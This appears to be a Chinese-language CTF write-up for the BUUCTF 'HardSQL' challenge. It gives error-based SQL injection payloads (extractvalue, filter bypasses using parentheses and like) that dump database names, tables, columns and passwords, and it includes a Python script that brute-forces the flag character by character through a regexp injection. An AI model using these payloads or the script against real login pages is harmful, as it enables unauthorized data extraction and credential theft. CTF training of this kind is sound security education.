BUU26 [极客大挑战 2019]HardSQL1

输入一些SQL关键词,发现空格,=,union,and,by都被过滤了

=被过滤,就用like替代

发现登录成功,可以注入

报错注入

注意

1.这里过滤了空格,就用()将内容包裹起来

比如说:select table_name from information_schema.tables

就可以换成:select(table_name)from(information_schema.tables)

2.过滤了=,where(table_name='geek')语句中的 = 就被过滤了,此时可以用 like 代替:

where(table_name)like('geek')

爆库名:

1'or(extractvalue(1,concat(0x7e,(select(database())))))#

爆表名:

1'or(extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema

)like('geek')),0x7e)))#

爆列名:这里限制条件只用写table_name=' H4rDsq1**'就行了,因为and被过滤了**

这里注意是(' H4rDsq1**')**

1'or(extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)

where(table_name)like('H4rDsq1')),0x7e)))#

爆password:这里就必须写( H4rDsq1**)**

1'or(extractvalue(1,concat(0x7e,(select(password)from(H4rDsq1)),0x7e)))#

但是显示不完整

发现substr也被过滤了,所以使用right或者regexp

right:

1'or(extractvalue(1,concat(0x7e,(select(right(password,20))from(H4rDsq1)),0x7e)))#

拼接起来

regexp:

regexp 是 SQL 中的正则表达式匹配运算符

url地址是直接复制的地址栏的地址,所以存在的都是编码后的字符,其原始语句为:1'or(extractvalue(1,concat(0x7e,(select(password)from(H4rDsq1)where(password)regexp('^f')),0x7e)))#【筛选出 H4rDsq1 表中 password 字段以 'f' 开头的记录】,可用payload:1'or(extractvalue(1,concat(0x7e,(select(password)from(H4rDsq1)where(password)regexp('^flag{5e0eabdd-83c3-466f-9e51-bb95d91d23ad}')),0x7e)))#,验证正则匹配方式的正确性,脚本如下:

正则表达式中,^f表示匹配字符串以 f 开头

python 复制代码
import requests  #requests 模块用于发送 HTTP 请求,与目标服务器进行交互。
import time      #time 模块用于添加延迟,避免请求过于频繁导致服务器拒绝。
#去掉了大写字母,可手动加上,ABCDEFGHIJKLMNOPQRSTUVWXYZ
#未写停止判断,当判断到strings最后一位且flag未在其中时停止即可
strings = 'abcdefghijklmnopqrstuvwxyz1234567890{}-_~' #定义了可能出现在 flag 中的字符集
i = 1
flag = ''  #flag 用于存储已经猜测到的部分 flag,初始为空字符串。
while i < 80:
    for one_char in strings:
        one_char = flag + one_char#先把已经猜好的和新遍历的字符拼接起来
        url = "http://4538af48-5b3e-451e-b6bf-565049f2caab.node4.buuoj.cn:81/check.php?username=12&password=1%27or%28extractvalue%281%2Cconcat%280x7e%2C%28select%28password%29from%28H4rDsq1%29where%28password%29regexp%28%27%5E"+str(one_char)+"%27%29%29%2C0x7e%29%29%29%23"
        #将one_char转换成字符串,以这个新猜的字符串为开头看看能不能匹配上真正的flag
        #如果能匹配上,它会返回匹配上的flag{xxxxxxxx}
        #(因为本意是查询有没有符合条件的字符串),所以回显的文本里会有flag字样
        time.sleep(0.05) #暂停 0.05 秒,避免请求过于频繁。
        rs = requests.get(url)
        if 'flag' in rs.text:   #如果响应文本中包含 'flag',说明当前猜测的部分 flag 是正确的,
            flag = one_char
            print("\r", end="") #\r回车
            print('flag为:' + flag, end='')
            break

参考:[极客大挑战 2019]HardSQL-1 - upfine - 博客园

相关推荐
设计师小聂!2 小时前
Linux系统中部署Redis详解
linux·运维·数据库·redis
kfepiza2 小时前
Debian-10编译安装Mysql-5.7.44 笔记250706
linux·数据库·笔记·mysql·debian·bash
Touper.2 小时前
Redis 基础详细介绍(Redis简单介绍,命令行客户端,Redis 命令,Java客户端)
java·数据库·redis
不剪发的Tony老师2 小时前
phpMyAdmin:一款经典的MySQL在线管理工具又回来了
数据库·mysql·phpmyadmin
极限实验室2 小时前
TDBC 2025 可信数据库发展大会,极限科技邀您来赴约!
数据库
lixia0417mul24 小时前
使用Starrocks替换Clickhouse的理由
数据库
张璐月5 小时前
mysql的性能优化:组提交、数据页复用、全表扫描优化、刷脏页
数据库·mysql·性能优化
沐尘而生5 小时前
【AI智能体】智能音视频-搭建可视化智能体
数据库·人工智能·ai作画·音视频·娱乐
NF禾凡6 小时前
【Mysql作业】
数据库·mysql
没有口袋啦7 小时前
NoSQL 介绍
数据库·nosql